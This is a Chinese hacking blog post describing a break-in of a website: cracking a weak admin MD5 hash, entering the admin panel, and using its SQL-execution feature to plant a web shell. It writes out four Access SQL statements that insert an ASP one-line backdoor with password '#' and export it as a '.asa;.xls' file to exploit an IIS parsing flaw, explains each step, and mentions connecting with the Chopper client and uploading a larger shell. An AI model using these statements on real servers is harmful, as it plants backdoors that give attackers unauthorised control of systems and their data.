目标站:
https://www.webshell.cc

我艹,开头太简单了,直接啊D搞定一切,就连TM的管理员md5还那么弱智,让我跑出来了,囸!直接进后台:

 

 

 


 

 
看到数据库备份我笑了,哈哈哈!老方法本地备份突破下,结果发现丫的不行!目录是只读的。

不过图1中有执行SQL语句,重点来了:

执行代码:

1.create table cmd (a varchar(50))

2.insert into cmd (a) values (‘<%execute request(chr(35))%>’)

3.select * into [a] in ’D:wwwrootM3loee.asa;.xls’ ’excel 4.0;’ from cmd;

4.drop table cmd;

解释下:

1.create table cmd (a varchar(50)) 建立一个有一个a字段的表 表名为cmd字段类型为字符 长度为50

2.insert into cmd (a) values (‘<%execute request(chr(35))%>’) 在表cmd的a字段插入密码为#的一句话木马

3.select * into [a] in ’D:wwwrootM3loee.asa;.xls’ ’excel 4.0;’ from cmd 把表cmd的内容导出为物理路径的一个excel文件,为什么用excel文件,因为ACCESS数据库不允许导出其他危险格式。我们导出为excel后在利用IIS解析漏洞就可以变成我们的小马了。

4.drop table cmd 删表.

理论知识是有的,但是就是差一个实际的网站来练练手了,毕竟搭的站缺乏真实感,就像带着Durex make love一样。

 

语句执行完毕后,兴匆匆地菜刀去连,提示404?FUCK!又执行了几次,确认语句没错后,觉得可能是菜刀的问题(不支持execute,只支持eval?)然后就是拼命地翻硬盘,翻啊翻。终于找到了一个php、asp通用的:

传一个小马:

大马传过了,组件删,aspx不支持,php不支持,第三方应用程序未尝试。只是记载下acc导出一句话拿shell

转载请注明来自WebShell'S Blog,本文地址:https://www.webshell.cc/472.html